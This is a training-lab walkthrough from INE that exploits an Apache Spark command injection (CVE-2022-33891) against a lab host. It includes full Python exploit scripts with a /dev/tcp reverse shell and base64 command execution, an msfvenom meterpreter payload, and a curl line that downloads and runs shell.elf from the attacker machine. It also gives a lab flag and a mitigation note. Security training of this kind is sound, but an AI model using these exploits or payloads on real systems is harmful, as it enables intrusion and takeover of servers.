    24 August 22

    Lab Walkthrough - Apache Spark Shell Command Injection

    Posted by INE

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Purpose: We will learn how to exploit Apache Spark using the Metasploit Framework module. We will also use Python to write and modify scripts that exploit the Apache Spark application.

    Technical difficulty: Beginner


    In 2022, a critical shell command injection vulnerability was found in the Apache Spark server. The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. An authentication filter checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input and execute it. This results in arbitrary shell command execution as the user Spark is currently running as.

    This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
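
The affected ranges listed above can be turned into a small version check. The following is a minimal sketch, assuming plain numeric x.y.z version strings; the names `parse_version`, `AFFECTED_RANGES`, and `is_affected` are illustrative and not part of Spark or the lab. Keep in mind that an affected version is only exploitable when ACLs are enabled.

```python
def parse_version(text):
    """Turn '3.1.1' into (3, 1, 1); suffixes such as '-SNAPSHOT' are not handled."""
    return tuple(int(part) for part in text.split("."))


# Inclusive ranges, copied from the affected-versions statement above.
AFFECTED_RANGES = [
    ((0, 0, 0), (3, 0, 3)),  # 3.0.3 and earlier
    ((3, 1, 1), (3, 1, 2)),  # 3.1.1 to 3.1.2
    ((3, 2, 0), (3, 2, 1)),  # 3.2.0 to 3.2.1
]


def is_affected(version):
    """Return True if the version falls inside one of the listed ranges."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


for candidate in ("3.1.1", "3.1.3", "3.2.1", "3.3.0"):
    print(candidate, is_affected(candidate))
```

Tuples compare element by element, so no third-party version library is needed for this simple case.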

    The vulnerability was discovered by Kostya Kortchinsky, a cybersecurity researcher from Databricks.


    What is Command Injection?

    Command injection is an attack in which unauthorized commands are executed on the host operating system. Typically, the threat actor injects the commands by exploiting an application flaw, such as inadequate input validation.



    Lab Environment

    In this lab environment, the user will access a Kali GUI instance. A vulnerable Apache Spark instance is deployed at http://demo.ine.local:8080

    Goal after completing this scenario: Access the /flag.txt file and read the flag!



    The best tools for this lab are:

    • Nmap

    • Bash Shell

    • Metasploit Framework

    • Python

    What is Apache Spark?

    Apache Spark is a multi-language engine for executing data engineering, data science, and machine learning on single-node machines or clusters.

    Apache Spark Key features

    Batch/streaming data

    Unify the processing of your data in batches and real-time streaming, using your preferred language: Python, SQL, Scala, Java or R.

    SQL analytics

    Execute fast, distributed ANSI SQL queries for dashboarding and ad-hoc reporting. Runs faster than most data warehouses.

    Data science at scale

    Perform Exploratory Data Analysis (EDA) on petabyte-scale data without having to resort to downsampling

    Machine learning

    Train machine learning algorithms on a laptop and use the same code to scale to fault-tolerant clusters of thousands of machines.


    Vulnerability Configuration

    • Enable ACLs by setting the configuration option spark.acls.enable, e.g., in conf/spark-defaults.conf
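
To see whether a given configuration file turns this option on, something like the following could be used. It is a rough sketch that assumes the file holds simple `key value` or `key=value` lines with `#` comments; `read_spark_conf` and `acls_enabled` are hypothetical helper names, and the sample content is made up for illustration.

```python
import re


def read_spark_conf(text):
    """Parse 'key value' or 'key=value' lines, skipping blanks and # comments."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Split once on the first run of whitespace and/or '='.
        parts = re.split(r"[=\s]+", line, maxsplit=1)
        if len(parts) == 2:
            settings[parts[0]] = parts[1].strip()
    return settings


def acls_enabled(text):
    """True only if spark.acls.enable is explicitly set to true."""
    return read_spark_conf(text).get("spark.acls.enable", "false").lower() == "true"


# Hypothetical file content, for illustration only.
sample = """
# conf/spark-defaults.conf
spark.master      spark://master:7077
spark.acls.enable true
"""
print(acls_enabled(sample))
```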

    Vulnerable Source Code


      private def getUnixGroups(username: String): Set[String] = {
    -   val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
        // we need to get rid of the trailing "\n" from the result of command execution
    -   Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
    +   Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
      }
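
The difference between the removed and added lines is the difference between handing a concatenated string to a shell and passing the input as a single argument. The sketch below reproduces that difference locally in Python as an analogy, not as Spark's code: it uses `sh -c` and `echo` as harmless stand-ins for `bash -c` and `id -Gn`, and the function names are illustrative.

```python
import subprocess


def run_via_shell(user_input):
    """Vulnerable pattern: the input is concatenated into a shell command string."""
    result = subprocess.run(
        ["sh", "-c", "echo " + user_input], capture_output=True, text=True
    )
    return result.stdout.strip()


def run_as_argv(user_input):
    """Patched pattern: the input is one argument of the program; no shell parses it."""
    result = subprocess.run(["echo", user_input], capture_output=True, text=True)
    return result.stdout.strip()


payload = "`echo injected`"
print(run_via_shell(payload))  # the shell runs the backticked command first
print(run_as_argv(payload))    # the backticks are treated as literal text
```

In the first call the shell evaluates the backticks before `echo` ever runs; in the second the payload is just data.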


    • Vulnerable parameter

    http://demo.ine.local:8080/?doAs=`[command injection here]`

    The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by running a raw Linux command.

    User input is processed through the ?doAs parameter, and in general nothing is reflected back on the page during command execution, so this is a blind OS command injection. Your commands run, but you get no direct indication of whether they succeeded, or even whether the program you are calling exists on the target.

    The value of the ?doAs URL parameter is concatenated into cmdSeq, which Spark executes in a background bash process as bash -c "id -Gn <value>". Any shell syntax in the value, such as backticks, is therefore interpreted by bash.
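
Because the injection is blind, a common way to confirm execution is to send a command with a known delay and time the request. The following sketch only builds the request URL and measures elapsed time; `build_doas_url` and `timed` are hypothetical helpers, and `send` is any callable you supply (for example `requests.get`), so nothing is sent when the block is merely loaded.

```python
import time
from urllib.parse import quote


def build_doas_url(base_url, command):
    """Wrap the command in backticks and percent-encode it for the doAs parameter."""
    value = quote("`" + command + "`", safe="")
    return f"{base_url}/?doAs={value}"


def timed(send, url):
    """Call send(url) and return how many seconds the call took."""
    start = time.monotonic()
    send(url)
    return time.monotonic() - start


print(build_doas_url("http://demo.ine.local:8080", "sleep 10"))
```

If `timed(requests.get, url)` for a `sleep 10` payload takes roughly ten seconds longer than a request with a harmless value, the command most likely ran.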



    Step 1: Open the lab link to access the Kali machine.

    Kali machine


    Step 2: Check if the provided machine is reachable.


    ping -c 4 demo.ine.local

    The provided machine is reachable.

    Step 3: Check all open ports on the machine.


    nmap demo.ine.local

    Multiple ports are open. The Apache Spark server is running on port 8080.
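
If only port 8080 is of interest, a single TCP connection attempt from Python answers the same question for that one port. This is a minimal sketch, not a replacement for Nmap; `is_port_open` is an illustrative name.

```python
import socket


def is_port_open(host, port, timeout=3.0):
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and name resolution failures.
        return False


# Example call inside the lab: is_port_open("demo.ine.local", 8080)
```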

    Step 4: Open Firefox and browse to port 8080 to identify the Apache Spark server version.

    URL: http://demo.ine.local:8080



    The target Apache Spark server version is 3.1.1.

    Step 5: Run a command on the target using the vulnerable ?doAs parameter.

    Request the crafted URL from the Kali terminal.



    The id command executed successfully on the target server and returned output.

    Note: You won’t receive the output of all Linux commands.

    This confirms that the target is vulnerable to CVE-2022-33891.

    Step 6: Write an Nmap script that detects the vulnerable Spark version, i.e., 3.1.1

    Nmap script

    -- The Head Section --
    description = [[The script to detect The Apache Spark Shell Command Injection vulnerability]]
    -- @usage
    -- nmap --script detect-spark-vuln <target>
    -- @output
    -- 8080/tcp open  http
    -- |_detect-spark-vuln: Apache Spark is Vulnerable to Command Injection!!
    categories = {"default", "safe"}
    local shortport = require "shortport"
    local http = require "http"
    local stdnse = require "stdnse"
    local string = require "string"
    -- The Rule Section --
    portrule = shortport.http
    -- The Action Section --
    action = function(host, port)
       local uri = "/"
       local text1 = "3.1.1"
       local response = http.get(host, port, uri)
       -- Only inspect the body when the page was actually served
       if ( response.status == 200 and response.body ) then
           -- Plain-text search (4th argument true), so "." is not treated as a wildcard
           if ( string.find(response.body, text1, 1, true) ) then
               return "Apache Spark is Vulnerable to Command Injection!!"
           else
               return "Apache Spark Not Vulnerable!!"
           end
       end
    end

    The script is straightforward. It requests the root page from the target's HTTP port (8080 here), looks for the version string 3.1.1 in the response body, and reports whether the target looks vulnerable.
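
The same body check can be expressed in Python, which may help when experimenting outside Nmap. This is a sketch under assumptions: the HTML fragment is a made-up example, not captured from the lab, and `find_versions` and `mentions_version` are hypothetical names. It also shows why a plain substring test is preferable to pattern matching here: in a Lua pattern or a regular expression, an unescaped `.` matches any character.

```python
import re

# Matches dotted x.y.z tokens such as 3.1.1; the dots are escaped on purpose.
VERSION_RE = re.compile(r"\b\d+\.\d+\.\d+\b")


def find_versions(body):
    """Return every x.y.z token found in the page body."""
    return VERSION_RE.findall(body)


def mentions_version(body, version):
    """Plain substring test, so '.' only matches a literal dot."""
    return version in body


# Hypothetical page fragment, for illustration only.
sample_body = '<span class="version">3.1.1</span> Spark Master at spark://demo:7077'
print(find_versions(sample_body))
print(mentions_version(sample_body, "3.1.1"))
```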

    Save the above code on the attacker’s machine and run it. The file extension should be .nse


    nano detect-spark-vuln.nse

    <paste code>


    Run the script.

    nmap --script detect-spark-vuln.nse demo.ine.local

    Successfully detected the Apache Spark server version 3.1.1 using a custom Nmap script.

    Step 7: Run a Python script to detect the Apache Spark command injection vulnerability

    Python Script

    #!/usr/bin/env python3
    import sys
    import requests
    import argparse
    import base64
    import datetime
    from colorama import Fore

    parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
    parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
    parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
    parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
    parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
    parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
    parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
    parser.add_argument('--verbose', default=False, action="store_true", help="Verbose mode")
    args = parser.parse_args()

    # nothing to see here, move along!
    headers = {
        'User-Agent': 'CVE-2022-33891 POC',
    }

    # Colors :D
    info = (Fore.BLUE + "[*] " + Fore.RESET)
    recc = (Fore.YELLOW + "[*] " + Fore.RESET)
    good = (Fore.GREEN + "[+] " + Fore.RESET)
    important = (Fore.CYAN + "[!] " + Fore.RESET)
    printError = (Fore.RED + "[X] " + Fore.RESET)

    full_url = f"{args.url}:{args.port}"


    def check_for_vuln(url):
        try:
            print(info + "Attempting to connect to site...")
            r = requests.get(f"{url}/?doAs='testing'", allow_redirects=False, headers=headers)
            if args.verbose:
                print(info + f"URL request: {url}/?doAs='testing'")
                print(info + f"Response status code: {r.status_code}")
            if r.status_code != 403:
                print(printError + "No ?doAs= endpoint. Does not look vulnerable.")
            elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
                print(printError + "Does not look like an Apache Spark server.")
            else:
                # Time a "sleep 10" payload to confirm blind command execution
                print(important + "Performing sleep test of 10 seconds...")
                t1 = datetime.datetime.now()
                if args.verbose:
                    print(info + f"T1: {t1}")
                run_cmd("sleep 10")
                t2 = datetime.datetime.now()
                delta = t2-t1
                if args.verbose:
                    print(info + f"T2: {t2}")
                    print(info + f"Delta T: {delta.seconds}")
                if delta.seconds not in range(8,12):
                    print(printError + "Sleep was less than 10. This target is probably not vulnerable")
                else:
                    print(good + "Sleep was 10 seconds! This target is probably vulnerable!")
        except Exception as e:
            print(printError + str(e))


    def cmd_prompt():
        cmd = input("[cve-2022-33891> ")
        return cmd


    def base64_encode(cmd):
        try:
            message_bytes = cmd.encode('ascii')
            base64_bytes = base64.b64encode(message_bytes)
            base64_cmd = base64_bytes.decode('ascii')
            return base64_cmd
        except Exception as e:
            print(printError +str(e))


    def run_cmd(cmd):
        try:
            if args.verbose:
                print(info + "Command is: " + cmd)
            base64_cmd = base64_encode(cmd)
            if args.verbose:
                print(info + "Base64 command is: " + base64_cmd)
            # The backticks make bash on the target evaluate the decoded command
            exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
            exploit_req = f"{full_url}{exploit}"
            if args.verbose:
                print(info + "Full exploit request is: " + exploit_req)
                print(info + "Sending exploit...")
            r = requests.get(exploit_req, allow_redirects=False, headers=headers)
            if args.verbose:
                print(info + f"Response status code: {r.status_code}\n"+ info + "Hint: 403 is good.")
        except Exception as e:
            print(printError + str(e))


    def revshell(lhost, lport):
        print(info + f"Reverse shell mode.\n" + recc+ f"Set up your listener by entering the following:\nnc -nvlp {lport}")
        input(recc + "When your listener is set up, press enter!")
        rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
        run_cmd(rev_shell_cmd)


    def main():
        try:
            if args.check and args.revshell:
                print(printError + "Please choose either revshell or check!")
                sys.exit(1)
            elif args.check:
                check_for_vuln(full_url)
            # Revshell
            elif args.revshell:
                if not (args.listeninghost and args.listeningport):
                    print(printError + "You need --listeninghost and --listeningport!")
                    sys.exit(1)
                else:
                    lhost = args.listeninghost
                    lport = args.listeningport
                    revshell(lhost, lport)
            else:
                # "Interactive" mode
                print(info + "\"Interactive\" mode!\n" + important + "Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
                while True:
                    command_to_run = cmd_prompt()
                    run_cmd(command_to_run)
        except KeyboardInterrupt:
            print("\n"+ info + "Goodbye!")


    if __name__ == "__main__":
        main()

    Copy and paste the above code into the Kali GUI and run the PoC code to check whether the target is vulnerable.

    Check the script help option.


    python3 <script>.py --help

    Running the script to verify the vulnerability.


    python3 <script>.py -u http://demo.ine.local -p 8080 --check --verbose

    Target appears to be vulnerable.

    Step 8: Write a simple Python script to execute a command on the target server

    Python Script

    import requests
    import argparse
    import base64

    my_parser = argparse.ArgumentParser(description='Apache Spark Command Injection')
    my_parser.add_argument('-T', '--URL', type=str, required=True)
    args = my_parser.parse_args()
    target = args.URL


    def shell(target):
        url = target
        # Make sure the Spark UI is reachable before sending payloads
        r = requests.get(target)
        if r.status_code == 200:
            print("[+] Exploiting")
            print("[+] Getting the shell... :)")
            while 1:
                try:
                    command = input("# ")
                    # Base64-encode the command so it survives URL and shell quoting
                    command_to_encode = command.encode('ascii')
                    base64_format = base64.b64encode(command_to_encode)
                    base64_final_cmd = base64_format.decode('ascii')
                    print("Base64 Command: " + base64_final_cmd)
                    payload = f"/?doAs=`echo {base64_final_cmd} | base64 -d | bash`"
                    exploiting = f"{url}{payload}"
                    r = requests.get(exploiting, allow_redirects=False)
                    print("Command Executed")
                except KeyboardInterrupt:
                    # Ctrl+C leaves the pseudo-shell
                    break
        else:
            print ("[*] Some issue occurred.")


    shell(target)

    Copy and paste the above code in the Kali GUI and run the PoC code to gain the meterpreter shell.
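
Both scripts wrap the command in base64 before placing it in ?doAs. A plausible reason, which the scripts themselves do not state, is that the encoded form contains no quotes, spaces, or shell metacharacters that could be mangled on the way to bash. The sketch below isolates that wrapper so it can be inspected locally without touching any target; `wrap_command` and `unwrap_command` are illustrative names.

```python
import base64


def wrap_command(cmd):
    """Build the `echo <b64> | base64 -d | bash` wrapper used by the scripts."""
    encoded = base64.b64encode(cmd.encode("ascii")).decode("ascii")
    return f"`echo {encoded} | base64 -d | bash`"


def unwrap_command(wrapped):
    """Recover the original command from a wrapper, for local inspection only."""
    encoded = wrapped.split()[1]  # second token is the base64 text
    return base64.b64decode(encoded).decode("ascii")


wrapped = wrap_command('ls "/tmp"; id')
print(wrapped)
print(unwrap_command(wrapped))
```

Round-tripping a command through these two functions is a quick way to check that quotes and semicolons arrive at bash unchanged.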


    Check the Attacker Machine IP address:


    ip addr

    Generate the .elf malicious executable for reverse connection.


    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=4444 -f elf > shell.elf
    file shell.elf

    Start Python simple HTTP server to serve the shell.elf file.


    python3 -m http.server 80

    Start Metasploit multi-handler for the new meterpreter session.


    msfconsole -q
    use exploit/multi/handler
    set PAYLOAD linux/x64/meterpreter/reverse_tcp
    set LHOST <attacker IP>
    set LPORT 4444
    exploit

    Check if the script is running correctly by checking its help option.


    python3 <script>.py --help

    It’s working fine. Run the script and download the shell.elf file on the target machine using curl by exploiting the vulnerability.


    python3 <script>.py --URL http://demo.ine.local:8080


    curl http://<attacker IP>/shell.elf --output /tmp/shell.elf; chmod +x /tmp/shell.elf; /bin/bash -c "/tmp/shell.elf"

    The shell.elf file was downloaded to the /tmp/ directory and executed on the target machine. After it ran, we received a meterpreter session:


    Step 9: Find the flag.


    ls /
    cat /flag.txt

    FLAG: aad8ee70c54f1cc0c0aad082423b09fe


    Mitigation

    • Upgrade to a supported Apache Spark maintenance release: 3.1.3, 3.2.2, or 3.3.0 or later.



